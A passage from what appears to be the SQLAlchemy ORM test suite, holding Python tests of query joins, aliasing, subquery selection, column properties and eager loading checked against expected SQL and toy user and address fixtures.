Address(user_id=8,email_address='ed@bettyboop.com',id=3),
Address(user_id=8,email_address='ed@lala.com',id=4)],
name='ed',id=8), 'ed@wood.com'),
(User(addresses=[
Address(user_id=8,email_address='ed@wood.com',id=2),
Address(user_id=8,email_address='ed@bettyboop.com',id=3),
Address(user_id=8,email_address='ed@lala.com',id=4)],name='ed',id=8),
'ed@bettyboop.com'),
(User(addresses=[
Address(user_id=8,email_address='ed@wood.com',id=2),
Address(user_id=8,email_address='ed@bettyboop.com',id=3),
Address(user_id=8,email_address='ed@lala.com',id=4)],name='ed',id=8),
'ed@lala.com'),
(User(addresses=[Address(user_id=9,email_address='fred@fred.com',id=5)],name='fred',id=9),
'fred@fred.com'),
(User(addresses=[],name='chuck',id=10), None)]
)
def test_column_from_limited_joinedload(self):
User = self.classes.User
sess = create_session()
def go():
results = sess.query(User).limit(1).\
options(joinedload('addresses')).\
add_column(User.name).all()
eq_(results, [(User(name='jack'), 'jack')])
self.assert_sql_count(testing.db, go, 1)
@testing.fails_on("firebird", "unknown")
@testing.fails_on('postgresql+pg8000', "'type oid 705 not mapped to py type' (due to literal)")
def test_self_referential(self):
Order = self.classes.Order
sess = create_session()
oalias = aliased(Order)
for q in [
sess.query(Order, oalias).\
filter(Order.user_id==oalias.user_id).filter(Order.user_id==7).\
filter(Order.id>oalias.id).order_by(Order.id, oalias.id),
sess.query(Order, oalias).from_self().filter(Order.user_id==oalias.user_id).\
filter(Order.user_id==7).filter(Order.id>oalias.id).\
order_by(Order.id, oalias.id),
# same thing, but reversed.
sess.query(oalias, Order).from_self().filter(oalias.user_id==Order.user_id).\
filter(oalias.user_id==7).filter(Order.id<oalias.id).\
order_by(oalias.id, Order.id),
# here we go....two layers of aliasing
sess.query(Order, oalias).filter(Order.user_id==oalias.user_id).\
filter(Order.user_id==7).filter(Order.id>oalias.id).\
from_self().order_by(Order.id, oalias.id).\
limit(10).options(joinedload(Order.items)),
# gratuitous four layers
sess.query(Order, oalias).filter(Order.user_id==oalias.user_id).\
filter(Order.user_id==7).filter(Order.id>oalias.id).from_self().\
from_self().from_self().order_by(Order.id, oalias.id).\
limit(10).options(joinedload(Order.items)),
]:
eq_(
q.all(),
[
(Order(address_id=1,description='order 3',isopen=1,user_id=7,id=3),
Order(address_id=1,description='order 1',isopen=0,user_id=7,id=1)),
(Order(address_id=None,description='order 5',isopen=0,user_id=7,id=5),
Order(address_id=1,description='order 1',isopen=0,user_id=7,id=1)),
(Order(address_id=None,description='order 5',isopen=0,user_id=7,id=5),
Order(address_id=1,description='order 3',isopen=1,user_id=7,id=3))
]
)
# ensure column expressions are taken from inside the subquery, not restated at the top
q = sess.query(Order.id, Order.description, literal_column("'q'").label('foo')).\
filter(Order.description == 'order 3').from_self()
self.assert_compile(q,
"SELECT anon_1.orders_id AS "
"anon_1_orders_id, anon_1.orders_descriptio"
"n AS anon_1_orders_description, "
"anon_1.foo AS anon_1_foo FROM (SELECT "
"orders.id AS orders_id, "
"orders.description AS orders_description, "
"'q' AS foo FROM orders WHERE "
"orders.description = :description_1) AS "
"anon_1")
eq_(
q.all(),
[(3, 'order 3', 'q')]
)
def test_multi_mappers(self):
Address, addresses, users, User = (self.classes.Address,
self.tables.addresses,
self.tables.users,
self.classes.User)
test_session = create_session()
(user7, user8, user9, user10) = test_session.query(User).all()
(address1, address2, address3, address4, address5) = \
test_session.query(Address).all()
expected = [(user7, address1),
(user8, address2),
(user8, address3),
(user8, address4),
(user9, address5),
(user10, None)]
sess = create_session()
selectquery = users.outerjoin(addresses).select(use_labels=True, order_by=[users.c.id, addresses.c.id])
eq_(list(sess.query(User, Address).instances(selectquery.execute())), expected)
sess.expunge_all()
for address_entity in (Address, aliased(Address)):
q = sess.query(User).add_entity(address_entity).\
outerjoin(address_entity, 'addresses').\
order_by(User.id, address_entity.id)
eq_(q.all(), expected)
sess.expunge_all()
q = sess.query(User).add_entity(address_entity)
q = q.join(address_entity, 'addresses')
q = q.filter_by(email_address='ed@bettyboop.com')
eq_(q.all(), [(user8, address3)])
sess.expunge_all()
q = sess.query(User, address_entity).join(address_entity, 'addresses').\
filter_by(email_address='ed@bettyboop.com')
eq_(q.all(), [(user8, address3)])
sess.expunge_all()
q = sess.query(User, address_entity).join(address_entity, 'addresses').\
options(joinedload('addresses')).\
filter_by(email_address='ed@bettyboop.com')
eq_(list(util.OrderedSet(q.all())), [(user8, address3)])
sess.expunge_all()
def test_aliased_multi_mappers(self):
User, addresses, users, Address = (self.classes.User,
self.tables.addresses,
self.tables.users,
self.classes.Address)
sess = create_session()
(user7, user8, user9, user10) = sess.query(User).all()
(address1, address2, address3, address4, address5) = sess.query(Address).all()
expected = [(user7, address1),
(user8, address2),
(user8, address3),
(user8, address4),
(user9, address5),
(user10, None)]
q = sess.query(User)
adalias = addresses.alias('adalias')
q = q.add_entity(Address, alias=adalias).select_entity_from(users.outerjoin(adalias))
l = q.order_by(User.id, adalias.c.id).all()
assert l == expected
sess.expunge_all()
q = sess.query(User).add_entity(Address, alias=adalias)
l = q.select_entity_from(users.outerjoin(adalias)).filter(adalias.c.email_address=='ed@bettyboop.com').all()
assert l == [(user8, address3)]
def test_with_entities(self):
User, Address = self.classes.User, self.classes.Address
sess = create_session()
q = sess.query(User).filter(User.id==7).order_by(User.name)
self.assert_compile(
q.with_entities(User.id,Address).\
filter(Address.user_id == User.id),
'SELECT users.id AS users_id, addresses.id '
'AS addresses_id, addresses.user_id AS '
'addresses_user_id, addresses.email_address'
' AS addresses_email_address FROM users, '
'addresses WHERE users.id = :id_1 AND '
'addresses.user_id = users.id ORDER BY '
'users.name')
def test_multi_columns(self):
users, User = self.tables.users, self.classes.User
sess = create_session()
expected = [(u, u.name) for u in sess.query(User).all()]
for add_col in (User.name, users.c.name):
assert sess.query(User).add_column(add_col).all() == expected
sess.expunge_all()
assert_raises(sa_exc.InvalidRequestError, sess.query(User).add_column, object())
def test_add_multi_columns(self):
"""test that add_column accepts a FROM clause."""
users, User = self.tables.users, self.classes.User
sess = create_session()
eq_(
sess.query(User.id).add_column(users).all(),
[(7, 7, 'jack'), (8, 8, 'ed'), (9, 9, 'fred'), (10, 10, 'chuck')]
)
def test_multi_columns_2(self):
"""test aliased/nonalised joins with the usage of add_column()"""
User, Address, addresses, users = (self.classes.User,
self.classes.Address,
self.tables.addresses,
self.tables.users)
sess = create_session()
(user7, user8, user9, user10) = sess.query(User).all()
expected = [(user7, 1),
(user8, 3),
(user9, 1),
(user10, 0)
]
q = sess.query(User)
q = q.group_by(users).order_by(User.id).outerjoin('addresses').\
add_column(func.count(Address.id).label('count'))
eq_(q.all(), expected)
sess.expunge_all()
adalias = aliased(Address)
q = sess.query(User)
q = q.group_by(users).order_by(User.id).outerjoin(adalias, 'addresses').\
add_column(func.count(adalias.id).label('count'))
eq_(q.all(), expected)
sess.expunge_all()
# TODO: figure out why group_by(users) doesn't work here
s = select([users, func.count(addresses.c.id).label('count')]).\
select_from(users.outerjoin(addresses)).\
group_by(*[c for c in users.c]).order_by(User.id)
q = sess.query(User)
l = q.add_column("count").from_statement(s).all()
assert l == expected
def test_raw_columns(self):
addresses, users, User = (self.tables.addresses,
self.tables.users,
self.classes.User)
sess = create_session()
(user7, user8, user9, user10) = sess.query(User).all()
expected = [
(user7, 1, "Name:jack"),
(user8, 3, "Name:ed"),
(user9, 1, "Name:fred"),
(user10, 0, "Name:chuck")]
adalias = addresses.alias()
q = create_session().query(User).add_column(func.count(adalias.c.id))\
.add_column(("Name:" + users.c.name)).outerjoin(adalias, 'addresses')\
.group_by(users).order_by(users.c.id)
assert q.all() == expected
# test with a straight statement
s = select([users, func.count(addresses.c.id).label('count'),
("Name:" + users.c.name).label('concat')],
from_obj=[users.outerjoin(addresses)],
group_by=[c for c in users.c], order_by=[users.c.id])
q = create_session().query(User)
l = q.add_column("count").add_column("concat").from_statement(s).all()
assert l == expected
sess.expunge_all()
# test with select_entity_from()
q = create_session().query(User).add_column(func.count(addresses.c.id))\
.add_column(("Name:" + users.c.name)).select_entity_from(users.outerjoin(addresses))\
.group_by(users).order_by(users.c.id)
assert q.all() == expected
sess.expunge_all()
q = create_session().query(User).add_column(func.count(addresses.c.id))\
.add_column(("Name:" + users.c.name)).outerjoin('addresses')\
.group_by(users).order_by(users.c.id)
assert q.all() == expected
sess.expunge_all()
q = create_session().query(User).add_column(func.count(adalias.c.id))\
.add_column(("Name:" + users.c.name)).outerjoin(adalias, 'addresses')\
.group_by(users).order_by(users.c.id)
assert q.all() == expected
sess.expunge_all()
def test_expression_selectable_matches_mzero(self):
User, Address = self.classes.User, self.classes.Address
ua = aliased(User)
aa = aliased(Address)
s = create_session()
for crit, j, exp in [
(User.id + Address.id, User.addresses,
"SELECT users.id + addresses.id AS anon_1 "
"FROM users JOIN addresses ON users.id = "
"addresses.user_id"
),
(User.id + Address.id, Address.user,
"SELECT users.id + addresses.id AS anon_1 "
"FROM addresses JOIN users ON users.id = "
"addresses.user_id"
),
(Address.id + User.id, User.addresses,
"SELECT addresses.id + users.id AS anon_1 "
"FROM users JOIN addresses ON users.id = "
"addresses.user_id"
),
(User.id + aa.id, (aa, User.addresses),
"SELECT users.id + addresses_1.id AS anon_1 "
"FROM users JOIN addresses AS addresses_1 "
"ON users.id = addresses_1.user_id"
),
]:
q = s.query(crit)
mzero = q._mapper_zero()
assert mzero.mapped_table is q._entity_zero().selectable
q = q.join(j)
self.assert_compile(q, exp)
for crit, j, exp in [
(ua.id + Address.id, ua.addresses,
"SELECT users_1.id + addresses.id AS anon_1 "
"FROM users AS users_1 JOIN addresses "
"ON users_1.id = addresses.user_id"),
(ua.id + aa.id, (aa, ua.addresses),
"SELECT users_1.id + addresses_1.id AS anon_1 "
"FROM users AS users_1 JOIN addresses AS "
"addresses_1 ON users_1.id = addresses_1.user_id"),
(ua.id + aa.id, (ua, aa.user),
"SELECT users_1.id + addresses_1.id AS anon_1 "
"FROM addresses AS addresses_1 JOIN "
"users AS users_1 "
"ON users_1.id = addresses_1.user_id")
]:
q = s.query(crit)
mzero = q._mapper_zero()
assert inspect(mzero).selectable is q._entity_zero().selectable
q = q.join(j)
self.assert_compile(q, exp)
def test_aliased_adapt_on_names(self):
User, Address = self.classes.User, self.classes.Address
sess = Session()
agg_address = sess.query(Address.id,
func.sum(func.length(Address.email_address)).label('email_address')
).group_by(Address.user_id)
ag1 = aliased(Address, agg_address.subquery())
ag2 = aliased(Address, agg_address.subquery(), adapt_on_names=True)
# first, without adapt on names, 'email_address' isn't matched up - we get the raw "address"
# element in the SELECT
self.assert_compile(
sess.query(User, ag1.email_address).join(ag1, User.addresses).filter(ag1.email_address > 5),
"SELECT users.id AS users_id, users.name AS users_name, addresses.email_address "
"AS addresses_email_address FROM addresses, users JOIN "
"(SELECT addresses.id AS id, sum(length(addresses.email_address)) "
"AS email_address FROM addresses GROUP BY addresses.user_id) AS "
"anon_1 ON users.id = addresses.user_id WHERE addresses.email_address > :email_address_1"
)
# second, 'email_address' matches up to the aggregate, and we get a smooth JOIN
# from users->subquery and that's it
self.assert_compile(
sess.query(User, ag2.email_address).join(ag2, User.addresses).filter(ag2.email_address > 5),
"SELECT users.id AS users_id, users.name AS users_name, "
"anon_1.email_address AS anon_1_email_address FROM users "
"JOIN (SELECT addresses.id AS id, sum(length(addresses.email_address)) "
"AS email_address FROM addresses GROUP BY addresses.user_id) AS "
"anon_1 ON users.id = addresses.user_id WHERE anon_1.email_address > :email_address_1",
)
class SelectFromTest(QueryTest, AssertsCompiledSQL):
run_setup_mappers = None
__dialect__ = 'default'
def test_replace_with_select(self):
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(User, users, properties = {
'addresses':relationship(Address)
})
mapper(Address, addresses)
sel = users.select(users.c.id.in_([7, 8])).alias()
sess = create_session()
eq_(sess.query(User).select_entity_from(sel).all(), [User(id=7), User(id=8)])
eq_(sess.query(User).select_entity_from(sel).filter(User.id==8).all(), [User(id=8)])
eq_(sess.query(User).select_entity_from(sel).order_by(desc(User.name)).all(), [
User(name='jack',id=7), User(name='ed',id=8)
])
eq_(sess.query(User).select_entity_from(sel).order_by(asc(User.name)).all(), [
User(name='ed',id=8), User(name='jack',id=7)
])
eq_(sess.query(User).select_entity_from(sel).options(joinedload('addresses')).first(),
User(name='jack', addresses=[Address(id=1)])
)
def test_join_mapper_order_by(self):
"""test that mapper-level order_by is adapted to a selectable."""
User, users = self.classes.User, self.tables.users
mapper(User, users, order_by=users.c.id)
sel = users.select(users.c.id.in_([7, 8]))
sess = create_session()
eq_(sess.query(User).select_entity_from(sel).all(),
[
User(name='jack',id=7), User(name='ed',id=8)
]
)
def test_differentiate_self_external(self):
"""test some different combinations of joining a table to a subquery of itself."""
users, User = self.tables.users, self.classes.User
mapper(User, users)
sess = create_session()
sel = sess.query(User).filter(User.id.in_([7, 8])).subquery()
ualias = aliased(User)
self.assert_compile(
sess.query(User).join(sel, User.id>sel.c.id),
"SELECT users.id AS users_id, users.name AS users_name FROM "
"users JOIN (SELECT users.id AS id, users.name AS name FROM "
"users WHERE users.id IN (:id_1, :id_2)) AS anon_1 ON users.id > anon_1.id",
)
self.assert_compile(
sess.query(ualias).select_entity_from(sel).filter(ualias.id>sel.c.id),
"SELECT users_1.id AS users_1_id, users_1.name AS users_1_name FROM "
"users AS users_1, (SELECT users.id AS id, users.name AS name FROM "
"users WHERE users.id IN (:id_1, :id_2)) AS anon_1 WHERE users_1.id > anon_1.id",
)
self.assert_compile(
sess.query(ualias).select_entity_from(sel).join(ualias, ualias.id>sel.c.id),
"SELECT users_1.id AS users_1_id, users_1.name AS users_1_name "
"FROM (SELECT users.id AS id, users.name AS name "
"FROM users WHERE users.id IN (:id_1, :id_2)) AS anon_1 "
"JOIN users AS users_1 ON users_1.id > anon_1.id"
)
self.assert_compile(
sess.query(ualias).select_entity_from(sel).join(ualias, ualias.id>User.id),
"SELECT users_1.id AS users_1_id, users_1.name AS users_1_name "
"FROM (SELECT users.id AS id, users.name AS name FROM "
"users WHERE users.id IN (:id_1, :id_2)) AS anon_1 "
"JOIN users AS users_1 ON anon_1.id < users_1.id"
)
salias = aliased(User, sel)
self.assert_compile(
sess.query(salias).join(ualias, ualias.id>salias.id),
"SELECT anon_1.id AS anon_1_id, anon_1.name AS anon_1_name FROM "
"(SELECT users.id AS id, users.name AS name FROM users WHERE users.id "
"IN (:id_1, :id_2)) AS anon_1 JOIN users AS users_1 ON users_1.id > anon_1.id",
)
# this one uses an explicit join(left, right, onclause) so it works
self.assert_compile(
sess.query(ualias).select_entity_from(join(sel, ualias, ualias.id>sel.c.id)),
"SELECT users_1.id AS users_1_id, users_1.name AS users_1_name FROM "
"(SELECT users.id AS id, users.name AS name FROM users WHERE users.id "
"IN (:id_1, :id_2)) AS anon_1 JOIN users AS users_1 ON users_1.id > anon_1.id",
use_default_dialect=True
)
def test_aliased_class_vs_nonaliased(self):
User, users = self.classes.User, self.tables.users
mapper(User, users)
ua = aliased(User)
sess = create_session()
self.assert_compile(
sess.query(User).select_from(ua).join(User, ua.name > User.name),
"SELECT users.id AS users_id, users.name AS users_name "
"FROM users AS users_1 JOIN users ON users.name < users_1.name"
)
self.assert_compile(
sess.query(User.name).select_from(ua).join(User, ua.name > User.name),
"SELECT users.name AS users_name FROM users AS users_1 "
"JOIN users ON users.name < users_1.name"
)
self.assert_compile(
sess.query(ua.name).select_from(ua).join(User, ua.name > User.name),
"SELECT users_1.name AS users_1_name FROM users AS users_1 "
"JOIN users ON users.name < users_1.name"
)
self.assert_compile(
sess.query(ua).select_from(User).join(ua, ua.name > User.name),
"SELECT users_1.id AS users_1_id, users_1.name AS users_1_name "
"FROM users JOIN users AS users_1 ON users.name < users_1.name"
)
# this is tested in many other places here, just adding it
# here for comparison
self.assert_compile(
sess.query(User.name).\
select_entity_from(users.select().where(users.c.id > 5)),
"SELECT anon_1.name AS anon_1_name FROM (SELECT users.id AS id, "
"users.name AS name FROM users WHERE users.id > :id_1) AS anon_1"
)
def test_join_no_order_by(self):
User, users = self.classes.User, self.tables.users
mapper(User, users)
sel = users.select(users.c.id.in_([7, 8]))
sess = create_session()
eq_(sess.query(User).select_entity_from(sel).all(),
[
User(name='jack',id=7), User(name='ed',id=8)
]
)
def test_join(self):
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(User, users, properties = {
'addresses':relationship(Address)
})
mapper(Address, addresses)
sel = users.select(users.c.id.in_([7, 8]))
sess = create_session()
eq_(sess.query(User).select_entity_from(sel).join('addresses').
add_entity(Address).order_by(User.id).order_by(Address.id).all(),
[
(User(name='jack',id=7), Address(user_id=7,email_address='jack@bean.com',id=1)),
(User(name='ed',id=8), Address(user_id=8,email_address='ed@wood.com',id=2)),
(User(name='ed',id=8), Address(user_id=8,email_address='ed@bettyboop.com',id=3)),
(User(name='ed',id=8), Address(user_id=8,email_address='ed@lala.com',id=4))
]
)
adalias = aliased(Address)
eq_(sess.query(User).select_entity_from(sel).join(adalias, 'addresses').
add_entity(adalias).order_by(User.id).order_by(adalias.id).all(),
[
(User(name='jack',id=7), Address(user_id=7,email_address='jack@bean.com',id=1)),
(User(name='ed',id=8), Address(user_id=8,email_address='ed@wood.com',id=2)),
(User(name='ed',id=8), Address(user_id=8,email_address='ed@bettyboop.com',id=3)),
(User(name='ed',id=8), Address(user_id=8,email_address='ed@lala.com',id=4))
]
)
def test_more_joins(self):
users, Keyword, orders, items, order_items, Order, Item, \
User, keywords, item_keywords = (self.tables.users,
self.classes.Keyword,
self.tables.orders,
self.tables.items,
self.tables.order_items,
self.classes.Order,
self.classes.Item,
self.classes.User,
self.tables.keywords,
self.tables.item_keywords)
mapper(User, users, properties={
'orders':relationship(Order, backref='user'), # o2m, m2o
})
mapper(Order, orders, properties={
'items':relationship(Item, secondary=order_items,
order_by=items.c.id), #m2m
})
mapper(Item, items, properties={
'keywords':relationship(Keyword, secondary=item_keywords,
order_by=keywords.c.id) #m2m
})
mapper(Keyword, keywords)
sess = create_session()
sel = users.select(users.c.id.in_([7, 8]))
eq_(sess.query(User).select_entity_from(sel).\
join('orders', 'items', 'keywords').\
filter(Keyword.name.in_(['red', 'big', 'round'])).\
all(),
[
User(name='jack',id=7)
])
eq_(sess.query(User).select_entity_from(sel).\
join('orders', 'items', 'keywords', aliased=True).\
filter(Keyword.name.in_(['red', 'big', 'round'])).\
all(),
[
User(name='jack',id=7)
])
def test_very_nested_joins_with_joinedload(self):
users, Keyword, orders, items, order_items, Order, Item, \
User, keywords, item_keywords = (self.tables.users,
self.classes.Keyword,
self.tables.orders,
self.tables.items,
self.tables.order_items,
self.classes.Order,
self.classes.Item,
self.classes.User,
self.tables.keywords,
self.tables.item_keywords)
mapper(User, users, properties={
'orders':relationship(Order, backref='user'), # o2m, m2o
})
mapper(Order, orders, properties={
'items':relationship(Item, secondary=order_items,
order_by=items.c.id), #m2m
})
mapper(Item, items, properties={
'keywords':relationship(Keyword, secondary=item_keywords,
order_by=keywords.c.id) #m2m
})
mapper(Keyword, keywords)
sess = create_session()
sel = users.select(users.c.id.in_([7, 8]))
def go():
eq_(
sess.query(User).select_entity_from(sel).
options(joinedload_all('orders.items.keywords')).
join('orders', 'items', 'keywords', aliased=True).
filter(Keyword.name.in_(['red', 'big', 'round'])).\
all(),
[
User(name='jack',orders=[
Order(description='order 1',items=[
Item(description='item 1',
keywords=[
Keyword(name='red'),
Keyword(name='big'),
Keyword(name='round')
]),
Item(description='item 2',
keywords=[
Keyword(name='red',id=2),
Keyword(name='small',id=5),
Keyword(name='square')
]),
Item(description='item 3',
keywords=[
Keyword(name='green',id=3),
Keyword(name='big',id=4),
Keyword(name='round',id=6)])
]),
Order(description='order 3',items=[
Item(description='item 3',
keywords=[
Keyword(name='green',id=3),
Keyword(name='big',id=4),
Keyword(name='round',id=6)
]),
Item(description='item 4',keywords=[],id=4),
Item(description='item 5',keywords=[],id=5)
]),
Order(description='order 5',
items=[
Item(description='item 5',keywords=[])])
])
])
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
sel2 = orders.select(orders.c.id.in_([1,2,3]))
eq_(sess.query(Order).select_entity_from(sel2).\
join('items', 'keywords').\
filter(Keyword.name == 'red').\
order_by(Order.id).all(), [
Order(description='order 1',id=1),
Order(description='order 2',id=2),
])
eq_(sess.query(Order).select_entity_from(sel2).\
join('items', 'keywords', aliased=True).\
filter(Keyword.name == 'red').\
order_by(Order.id).all(), [
Order(description='order 1',id=1),
Order(description='order 2',id=2),
])
def test_replace_with_eager(self):
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(User, users, properties = {
'addresses':relationship(Address, order_by=addresses.c.id)
})
mapper(Address, addresses)
sel = users.select(users.c.id.in_([7, 8]))
sess = create_session()
def go():
eq_(sess.query(User).options(
joinedload('addresses')
).select_entity_from(sel).order_by(User.id).all(),
[
User(id=7, addresses=[Address(id=1)]),
User(id=8, addresses=[Address(id=2), Address(id=3), Address(id=4)])
]
)
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
def go():
eq_(sess.query(User).options(
joinedload('addresses')
).select_entity_from(sel).filter(User.id==8).order_by(User.id).all(),
[User(id=8, addresses=[Address(id=2), Address(id=3), Address(id=4)])]
)
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
def go():
eq_(sess.query(User).options(
joinedload('addresses')
).select_entity_from(sel).order_by(User.id)[1],
User(id=8, addresses=[Address(id=2), Address(id=3), Address(id=4)]))
self.assert_sql_count(testing.db, go, 1)
class CustomJoinTest(QueryTest):
run_setup_mappers = None
def test_double_same_mappers(self):
"""test aliasing of joins with a custom join condition"""
addresses, items, order_items, orders, Item, User, Address, Order, users = (self.tables.addresses,
self.tables.items,
self.tables.order_items,
self.tables.orders,
self.classes.Item,
self.classes.User,
self.classes.Address,
self.classes.Order,
self.tables.users)
mapper(Address, addresses)
mapper(Order, orders, properties={
'items':relationship(Item, secondary=order_items, lazy='select', order_by=items.c.id),
})
mapper(Item, items)
mapper(User, users, properties = dict(
addresses = relationship(Address, lazy='select'),
open_orders = relationship(Order, primaryjoin = and_(orders.c.isopen == 1, users.c.id==orders.c.user_id), lazy='select'),
closed_orders = relationship(Order, primaryjoin = and_(orders.c.isopen == 0, users.c.id==orders.c.user_id), lazy='select')
))
q = create_session().query(User)
eq_(
q.join('open_orders', 'items', aliased=True).filter(Item.id==4).\
join('closed_orders', 'items', aliased=True).filter(Item.id==3).all(),
[User(id=7)]
)
class ExternalColumnsTest(QueryTest):
"""test mappers with SQL-expressions added as column properties."""
run_setup_mappers = None
def test_external_columns_bad(self):
users, User = self.tables.users, self.classes.User
assert_raises_message(sa_exc.ArgumentError, "not represented in the mapper's table", mapper, User, users, properties={
'concat': (users.c.id * 2),
})
clear_mappers()
def test_external_columns(self):
"""test querying mappings that reference external columns or selectables."""
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(User, users, properties={
'concat': column_property((users.c.id * 2)),
'count': column_property(
select([func.count(addresses.c.id)], users.c.id==addresses.c.user_id).\
correlate(users).\
as_scalar())
})
mapper(Address, addresses, properties={
'user':relationship(User)
})
sess = create_session()
sess.query(Address).options(joinedload('user')).all()
eq_(sess.query(User).all(),
[
User(id=7, concat=14, count=1),
User(id=8, concat=16, count=3),
User(id=9, concat=18, count=1),
User(id=10, concat=20, count=0),
]
)
address_result = [
Address(id=1, user=User(id=7, concat=14, count=1)),
Address(id=2, user=User(id=8, concat=16, count=3)),
Address(id=3, user=User(id=8, concat=16, count=3)),
Address(id=4, user=User(id=8, concat=16, count=3)),
Address(id=5, user=User(id=9, concat=18, count=1))
]
eq_(sess.query(Address).all(), address_result)
# run the eager version twice to test caching of aliased clauses
for x in range(2):
sess.expunge_all()
def go():
eq_(sess.query(Address).\
options(joinedload('user')).\
order_by(Address.id).all(),
address_result)
self.assert_sql_count(testing.db, go, 1)
ualias = aliased(User)
eq_(
sess.query(Address, ualias).join(ualias, 'user').all(),
[(address, address.user) for address in address_result]
)
eq_(
sess.query(Address, ualias.count).\
join(ualias, 'user').\
join('user', aliased=True).\
order_by(Address.id).all(),
[
(Address(id=1), 1),
(Address(id=2), 3),
(Address(id=3), 3),
(Address(id=4), 3),
(Address(id=5), 1)
]
)
eq_(sess.query(Address, ualias.concat, ualias.count).
join(ualias, 'user').
join('user', aliased=True).order_by(Address.id).all(),
[
(Address(id=1), 14, 1),
(Address(id=2), 16, 3),
(Address(id=3), 16, 3),
(Address(id=4), 16, 3),
(Address(id=5), 18, 1)
]
)
ua = aliased(User)
eq_(sess.query(Address, ua.concat, ua.count).
select_entity_from(join(Address, ua, 'user')).
options(joinedload(Address.user)).order_by(Address.id).all(),
[
(Address(id=1, user=User(id=7, concat=14, count=1)), 14, 1),
(Address(id=2, user=User(id=8, concat=16, count=3)), 16, 3),
(Address(id=3, user=User(id=8, concat=16, count=3)), 16, 3),
(Address(id=4, user=User(id=8, concat=16, count=3)), 16, 3),
(Address(id=5, user=User(id=9, concat=18, count=1)), 18, 1)
]
)
eq_(list(sess.query(Address).join('user').values(Address.id, User.id, User.concat, User.count)),
[(1, 7, 14, 1), (2, 8, 16, 3), (3, 8, 16, 3), (4, 8, 16, 3), (5, 9, 18, 1)]
)
eq_(list(sess.query(Address, ua).select_entity_from(join(Address,ua, 'user')).values(Address.id, ua.id, ua.concat, ua.count)),
[(1, 7, 14, 1), (2, 8, 16, 3), (3, 8, 16, 3), (4, 8, 16, 3), (5, 9, 18, 1)]
)
def test_external_columns_joinedload(self):
users, orders, User, Address, Order, addresses = (self.tables.users,
self.tables.orders,
self.classes.User,
self.classes.Address,
self.classes.Order,
self.tables.addresses)
# in this test, we have a subquery on User that accesses "addresses", underneath
# a joinedload for "addresses". So the "addresses" alias adapter needs to *not* hit
# the "addresses" table within the "user" subquery, but "user" still needs to be adapted.
# therefore the long-standing practice of eager adapters being "chained" has been removed,
# since it's unnecessary and breaks this exact condition.
mapper(User, users, properties={
'addresses':relationship(Address, backref='user', order_by=addresses.c.id),
'concat': column_property((users.c.id * 2)),
'count': column_property(select([func.count(addresses.c.id)], users.c.id==addresses.c.user_id).correlate(users))
})
mapper(Address, addresses)
mapper(Order, orders, properties={
'address':relationship(Address), # m2o
})
sess = create_session()
def go():
o1 = sess.query(Order).options(joinedload_all('address.user')).get(1)
eq_(o1.address.user.count, 1)
self.assert_sql_count(testing.db, go, 1)
sess = create_session()
def go():
o1 = sess.query(Order).options(joinedload_all('address.user')).first()
eq_(o1.address.user.count, 1)
self.assert_sql_count(testing.db, go, 1)
def test_external_columns_compound(self):
# see [ticket:2167] for background
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(User, users, properties={
'fullname':column_property(users.c.name.label('x'))
})
mapper(Address, addresses, properties={
'username':column_property(
select([User.fullname]).\
where(User.id==addresses.c.user_id).label('y'))
})
sess = create_session()
a1 = sess.query(Address).first()
eq_(a1.username, "jack")
sess = create_session()
a1 = sess.query(Address).from_self().first()
eq_(a1.username, "jack")
class TestOverlyEagerEquivalentCols(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
base = Table('base', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('data', String(50))
)
sub1 = Table('sub1', metadata,
Column('id', Integer, ForeignKey('base.id'), primary_key=True),
Column('data', String(50))
)
sub2 = Table('sub2', metadata,
Column('id', Integer, ForeignKey('base.id'), ForeignKey('sub1.id'), primary_key=True),
Column('data', String(50))
)
def test_equivs(self):
base, sub2, sub1 = (self.tables.base,
self.tables.sub2,
self.tables.sub1)
class Base(fixtures.ComparableEntity):
pass
class Sub1(fixtures.ComparableEntity):
pass
class Sub2(fixtures.ComparableEntity):
pass
mapper(Base, base, properties={
'sub1':relationship(Sub1),
'sub2':relationship(Sub2)
})
mapper(Sub1, sub1)
mapper(Sub2, sub2)
sess = create_session()
s11 = Sub1(data='s11')
s12 = Sub1(data='s12')
s2 = Sub2(data='s2')
b1 = Base(data='b1', sub1=[s11], sub2=[])
b2 = Base(data='b1', sub1=[s12], sub2=[])
sess.add(b1)
sess.add(b2)
sess.flush()
# there's an overlapping ForeignKey here, so there's not much option except
# to artificially control the flush order
b2.sub2 = [s2]
sess.flush()
q = sess.query(Base).outerjoin('sub2', aliased=True)
assert sub1.c.id not in q._filter_aliases.equivalents
eq_(
sess.query(Base).join('sub1').outerjoin('sub2', aliased=True).\
filter(Sub1.id==1).one(),
b1
)
class LabelCollideTest(fixtures.MappedTest):
"""Test handling for a label collision. This collision
is handled by core, see ticket:2702 as well as
test/sql/test_selectable->WithLabelsTest. Here we want
to make sure the end result is as we expect.
"""
@classmethod
def define_tables(cls, metadata):
Table('foo', metadata,
Column('id', Integer, primary_key=True),
Column('bar_id', Integer)
)
Table('foo_bar', metadata,
Column('id', Integer, primary_key=True),
)
@classmethod
def setup_classes(cls):
class Foo(cls.Basic):
pass
class Bar(cls.Basic):
pass
@classmethod
def setup_mappers(cls):
mapper(cls.classes.Foo, cls.tables.foo)
mapper(cls.classes.Bar, cls.tables.foo_bar)
@classmethod
def insert_data(cls):
s = Session()
s.add_all([
cls.classes.Foo(id=1, bar_id=2),
cls.classes.Bar(id=3)
])
s.commit()
def test_overlap_plain(self):
s = Session()
row = s.query(self.classes.Foo, self.classes.Bar).all()[0]
def go():
eq_(row.Foo.id, 1)
eq_(row.Foo.bar_id, 2)
eq_(row.Bar.id, 3)
# all three columns are loaded independently without
# overlap, no additional SQL to load all attributes
self.assert_sql_count(testing.db, go, 0)
def test_overlap_subquery(self):
s = Session()
